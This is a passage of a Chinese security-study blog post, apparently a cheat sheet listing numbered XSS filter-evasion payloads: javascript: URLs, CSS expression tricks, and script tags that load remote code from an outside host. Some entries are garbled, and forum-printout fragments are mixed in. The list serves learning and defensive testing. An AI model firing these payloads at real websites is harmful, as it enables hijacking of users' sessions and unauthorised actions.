<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;STYLE&gt;li &#123;list-style-image: url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);&#125;&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</span><br></pre></td></tr></table></figure>

<p>(40)IMG VBscript</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</span><br></pre></td></tr></table></figure>

<p>(41)META链接url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;</span><br><span class="line"></span><br><span class="line">URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(42)Iframe</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;</span><br></pre></td></tr></table></figure>

<p>(43)Frame</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;12-7-1 T00LS - Powered by Discuz! Board</span><br><span class="line"></span><br><span class="line">https://www.a.com/viewthread.php?action=printable&amp;tid=15267 3/6</span><br></pre></td></tr></table></figure>

<p>(44)Table</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(45)TD</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(46)DIV background-image</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(47)DIV background-image后加上额外字符(1-32&amp;34&amp;39&amp;160&amp;8192-<br>8&amp;13&amp;12288&amp;65279)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(48)DIV expression</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;DIV STYLE=&quot;width: expression_r(alert(&apos;XSS&apos;));&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(49)STYLE属性分拆表达</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG STYLE=&quot;xss:expression_r(alert(&apos;XSS&apos;))&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(50)匿名STYLE(组成:开角号和一个字母开头)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;XSS STYLE=&quot;xss:expression_r(alert(&apos;XSS&apos;))&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(51)STYLE background-image</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;STYLE&gt;.XSS&#123;background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);&#125;&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(52)IMG STYLE方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exppression(alert(&quot;XSS&quot;))&apos;&gt;</span><br></pre></td></tr></table></figure>

<p>(53)STYLE background</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;STYLE&gt;&lt;STYLE type=&quot;text/css&quot;&gt;BODY&#123;background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)&#125;&lt;/STYLE&gt;</span><br></pre></td></tr></table></figure>

<p>(54)BASE</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;EMBED SRC=&quot;http://3w.org/XSS/xss.swf&quot; &gt;&lt;/EMBED&gt;</span><br></pre></td></tr></table></figure>

<p>(56)在flash中使用ActionScrpt可以混进你XSS的代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">a=&quot;get&quot;;</span><br><span class="line"></span><br><span class="line">b=&quot;URL(\&quot;&quot;;</span><br><span class="line"></span><br><span class="line">c=&quot;javascript:&quot;;</span><br><span class="line"></span><br><span class="line">d=&quot;alert(&apos;XSS&apos;);\&quot;)&quot;;</span><br><span class="line"></span><br><span class="line">eval_r(a+b+c+d);</span><br></pre></td></tr></table></figure>

<p>(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;HTML xmlns:xss&gt;</span><br><span class="line"></span><br><span class="line">&lt;?import namespace=&quot;xss&quot; implementation=&quot;http://3w.org/XSS/xss.htc&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;</span><br><span class="line"></span><br><span class="line">&lt;/HTML&gt;</span><br></pre></td></tr></table></figure>

<p>(58)如果过滤了你的JS你可以在图片里添加JS代码来利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT SRC=&quot;&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(59)IMG嵌入式命令,可执行任意命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;IMG SRC=&quot;http://www.a.com/a.php?a=b&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>(60)IMG嵌入式命令(a.jpg在同服务器)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Redirect 302 /a.jpg http://www.XXX.com/admin.asp&amp;deleteuser</span><br></pre></td></tr></table></figure>

<p>(61)绕符号过滤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://3w.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(62)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT =&quot;&gt;&quot; SRC=&quot;http://3w.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(63)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT a=&quot;&gt;&quot; &quot; SRC=&quot;http://3w.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(64)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://3w.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(65)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT a=`&gt;` SRC=&quot;http://3w.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(66)12-7-1 T00LS - Powered by Discuz! Board</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://www.a.com/viewthread.php?action=printable&amp;tid=15267 4/6</span><br><span class="line"></span><br><span class="line">&lt;SCRIPT a=&quot;&gt;&apos;&gt;&quot; SRC=&quot;http://3w.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(67)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://3w.org/xss.js&quot;&gt;</span><br><span class="line"></span><br><span class="line">&lt;/SCRIPT&gt;</span><br></pre></td></tr></table></figure>

<p>(68)URL绕行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://127.0.0.1/&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(69)URL编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://3w.org&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(70)IP十进制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://3232235521″&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(71)IP十六进制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://0xc0.0xa8.0×00.0×01″&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(72)IP八进制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://0300.0250.0000.0001″&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(73)混合编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://6 6.000146.0×7.147/&quot;&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(74)节省[http:]</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(75)节省[www]</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(76)绝对点绝对DNS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>

<p>(77)javascript链接</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;</span><br></pre></td></tr></table></figure>
      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"># XSS</a>
          
            <a href="/tags/漏洞学习/" rel="tag"># 漏洞学习</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/07/24/RCTF2019 nextphp writeup/" rel="prev" title="RCTF2019 nextphp writeup">
                RCTF2019 nextphp writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="Huha">
            
              <p class="site-author-name" itemprop="name">Huha</p>
              <p class="site-description motion-element" itemprop="description">空集是所有集合的子集</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">2</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">2</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS漏洞基础"><span class="nav-number">1.</span> <span class="nav-text">XSS漏洞基础</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS入门介绍"><span class="nav-number">1.0.1.</span> <span class="nav-text">XSS入门介绍</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#解析器如何工作"><span class="nav-number">1.0.2.</span> <span class="nav-text">解析器如何工作</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#HTML-entities（HTML-实体）"><span class="nav-number">1.0.3.</span> <span class="nav-text">HTML entities（HTML 实体）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#浏览器如何解码（Freebuf博主）"><span class="nav-number">1.0.4.</span> <span class="nav-text">浏览器如何解码（Freebuf博主）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS漏洞复现"><span class="nav-number">1.0.5.</span> <span class="nav-text">XSS漏洞复现</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DVWA安装："><span class="nav-number">1.0.6.</span> <span class="nav-text">DVWA安装：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DVWA靶场游玩攻略（XSS）："><span class="nav-number">1.0.7.</span> <span class="nav-text">DVWA靶场游玩攻略（XSS）：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS平台搭建"><span class="nav-number">1.0.8.</span> <span class="nav-text">XSS平台搭建</span></a></li></ol></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#XSS漏洞挖掘"><span class="nav-number">2.</span> <span class="nav-text">XSS漏洞挖掘</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS-game"><span class="nav-number">2.0.1.</span> <span class="nav-text">XSS game</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Hack-me"><span class="nav-number">2.0.2.</span> <span class="nav-text">Hack me</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#XSStrike"><span class="nav-number">2.0.3.</span> <span class="nav-text">XSStrike</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#基于DOM的XSS模糊测试论文（基础打好后再看）"><span class="nav-number">2.0.4.</span> <span class="nav-text">基于DOM的XSS模糊测试论文（基础打好后再看）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#附常见的XSS攻击方法"><span class="nav-number">3.</span> <span class="nav-text">附常见的XSS攻击方法</span></a></li></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Huha</span>

  







  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> v6.7.0</div>





<div>
<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

Site views <span id="busuanzi_value_site_pv"></span> 次&nbsp&nbsp&nbsp
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/src/utils.js?v=6.7.0"></script>

  <script src="/js/src/motion.js?v=6.7.0"></script>



  
  

  
  <script src="/js/src/scrollspy.js?v=6.7.0"></script>
<script src="/js/src/post-details.js?v=6.7.0"></script>



  


  <script src="/js/src/bootstrap.js?v=6.7.0"></script>



  



  











  

  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap');
      $(e).after($wrap);
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text();
        }).toArray().join('\n');
        var ta = document.createElement('textarea');
        var range = document.createRange(); //For Chrome
        var sel = window.getSelection(); //For Chrome
        var yPosition = window.pageYOffset || document.documentElement.scrollTop;
        ta.style.top = yPosition + 'px'; //Prevent page scroll
        ta.style.position = 'absolute';
        ta.style.opacity = '0';
        ta.value = code;
        ta.textContent = code; //For FireFox
        ta.contentEditable = true;
        ta.readOnly = false;
        document.body.appendChild(ta);
        range.selectNode(ta);
        sel.removeAllRanges();
        sel.addRange(range);
        ta.setSelectionRange(0, code.length);
        var result = document.execCommand('copy');
        
          if (result) $(this).text('复制成功');
          else $(this).text('复制失败');
        
        ta.blur(); //For iOS
        $(this).blur();
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn');
        setTimeout(function () {
          $b.text('复制');
        }, 300);
      }).append(e);
